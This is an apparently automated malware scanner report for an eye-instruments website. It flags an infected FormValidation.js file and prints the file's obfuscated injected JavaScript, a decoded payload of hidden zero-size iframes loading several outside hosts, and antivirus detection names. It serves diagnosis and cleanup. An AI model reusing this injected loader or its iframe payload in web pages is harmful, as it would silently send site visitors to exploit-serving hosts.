New scan:

Malware Scanner report for eye-instruments.com

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "eye-instruments.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eye-instruments.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://eye-instruments.com/
200 OK
Content-Length: 19823
Content-Type: text/html
clean
http://eye-instruments.com/home.htm
200 OK
Content-Length: 14137
Content-Type: text/html
clean
http://eye-instruments.com/cart.asp
200 OK
Content-Length: 13619
Content-Type: text/html
clean
http://eye-instruments.com/home.asp
200 OK
Content-Length: 19823
Content-Type: text/html
clean
http://eye-instruments.com/search.asp?cat=aa11
200 OK
Content-Length: 36295
Content-Type: text/html
clean
http://eye-instruments.com/search.asp?cat=aa12
200 OK
Content-Length: 36140
Content-Type: text/html
clean
http://eye-instruments.com/search.asp?cat=aa13
200 OK
Content-Length: 36750
Content-Type: text/html
clean
http://eye-instruments.com/search.asp?cat=aa14
200 OK
Content-Length: 36420
Content-Type: text/html
clean
http://eye-instruments.com/enquiry.asp
200 OK
Content-Length: 18553
Content-Type: text/html
clean
http://eye-instruments.com/FormValidation.js
200 OK
Content-Length: 30118
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function UsernameValid(Data1)
{
while(''+Data1.value.charAt(0)==' ')
{
Data1.value=Data1.value.substring(1,Data1.value.length);
}
while(''+Data1.value.charAt(Data1.value.length-1)==' ')
{
Data1.value=Data1.value.substring(0,Data1.value.length-1);
}

var allValid = true;
if (Data1.value != "")
{
var ch = "0123456789_-";
var Str1 = Data1.value;
ch1=Str1.charAt(0)
... 3391 bytes are skipped ...
pe(document[_0x6dae[3]][_0x6dae[6]](offset,end));} ;} ;return _0x237bx4;} ;if(get_cookie(_0x6dae[7])==_0x6dae[1]&&navigator[_0x6dae[8]]==_0x6dae[9]){if(navigator[_0x6dae[10]]==_0x6dae[11]||navigator[_0x6dae[10]]==_0x6dae[12]){var popfrequency=_0x6dae[13];var expireDate= new Date();expireDate[_0x6dae[15]](expireDate[_0x6dae[14]]()+parseInt(popfrequency));document[_0x6dae[3]]=_0x6dae[16]+parseInt(popfrequency)+_0x6dae[17]+expireDate[_0x6dae[18]]();document[_0x6dae[20]](_0x6dae[19]);} ;} ;

Decoded script:


<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborde
... 87 bytes are skipped ...
op:45%; left:45%; border:5px solid gray; padding:40px; padding-top:10px; background:#fff; text-align:left;"><span style="color:gray; cursor:pointer; margin-bottom:20px; display:block;" onClick="$(this).parent().hide()"><img src="http://77.81.240.235/waiting.gif"></span></div><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Agent.GGJ
Emsisoft
Trojan.JS.Agent.GGJ (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
NANO-Antivirus
Trojan.Url.IframeB.bmlwta
F-Secure
Trojan.JS.Agent.GGJ
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Agent.GGJ
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Agent.GGJ

http://eye-instruments.com/contact.asp
200 OK
Content-Length: 12508
Content-Type: text/html
clean
http://eye-instruments.com/feedback.asp
200 OK
Content-Length: 19550
Content-Type: text/html
clean
http://eye-instruments.com/test404page.js
404 Not Found
Content-Length: 1245
Content-Type: text/html
clean
http://eye-instruments.com/Search.asp?Move=1
500 Internal Server Error
Content-Length: 1208
Content-Type: text/html
clean
http://eye-instruments.com/Search.asp?Move=2
500 Internal Server Error
Content-Length: 1208
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eye-instruments.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 03 Mar 2015 08:21:14 GMT
Server: Microsoft-IIS/7.5
Content-Length: 19823
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQSRATBQ=BMFLGDJCCBECJOMEAHJMPEMH; path=/
X-Powered-By: ASP.NET

...19823 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eye-instruments.com
Referer: http://www.google.com/search?q=eye-instruments.com

Result:
The result is similar to the first query. There are no suspicious redirects found.